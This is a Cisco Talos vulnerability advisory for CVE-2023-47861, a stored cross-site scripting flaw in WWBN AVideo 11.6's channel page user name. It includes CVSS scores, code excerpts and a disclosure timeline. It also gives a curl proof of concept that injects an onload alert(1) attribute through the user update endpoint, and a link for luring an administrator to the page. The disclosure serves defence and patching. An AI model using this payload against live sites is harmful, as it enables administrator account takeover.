9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
5.8 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
37.9%
CVE-2023-47861
A cross-site scripting (xss) vulnerability exists in the channelBody.php user name functionality of WWBN AVideo 11.6 and dev master commit 15fed957fb. A specially crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get a user to visit a webpage to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
WWBN AVideo 11.6
WWBN AVideo dev master commit 15fed957fb
AVideo - <https://github.com/WWBN/AVideo>
9.0 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.
The PHP file view/channelBody.php
is vulnerable to an XSS issue due to improper sanitization of the user name.
channelBody.php
is included by channel.php
:
include $global['systemRootPath'] . 'view/channelBody.php';
Inside channelBody.php
, the user photo is shown:
} else {
?>
<div></div>
<a href target="_blank">
[1] <img src alt="<?php echo $user->_getName(); ?>" />
</a>
<?php
}
At [1], the user name is echoed using $user->_getName()
:
public function _getName()
{
return $this->name;
}
This function simply returns the name
field of the User
object. The name field is originally set using setName
:
public function setName($name)
{
$this->name = strip_tags($name);
}
strip_tags
is used to remove tags, which could be used to inject arbitrary JavaScript. However, since the user name is echoed inside an <img>
tag, there’s no need to inject tags in order to execute arbitrary JavaScript.
For example, a privileged attacker could change their user name to someuser" onload="alert(1)
, which would execute alert(1)
without using tags and thus bypass the strip_tag
in setName
.
Exploitation leads to a straightforward stored cross-site scripting issue (XSS) when visiting a user’s channel. This can be used by an attacker, in the worst case, to take over an administrator account, for example by tricking an administrator into browsing the attacker’s channel.
This proof-of-concept calls alert(1)
:
$ curl -k $'https://localhost/objects/userUpdate.json.php' \
-H 'Cookie: 84b11d010cced71edffee7aa62c4eda0=bir8alr05n4s0tjaqninjjnr66' \
-H 'Referer: https://localhost/user' \
--data-raw $'user=user1&pass=&email=user1@localhost&phone=&name=someuser" onload="alert(1)&about=&channelName=User1&donationLink=&analyticsCode='
{"error":false,"msg":"","users_id":2}
Note the user id is 2
.
Trick the administrator into visiting the attacker’s channel by clicking the following URL, which will execute alert(1)
.
https://localhost/view/channel.php?channelName=2
Make sure to use the user id (2
in this case) for channelName
.
2023-12-14 - Vendor Disclosure
2023-12-15 - Vendor Patch Release
2024-01-10 - Public Release
Discovered by Claudio Bozzato of Cisco Talos.
Vulnerability Reports Next Report
TALOS-2023-1885
Previous Report
TALOS-2023-1883
9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
5.8 Medium
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
37.9%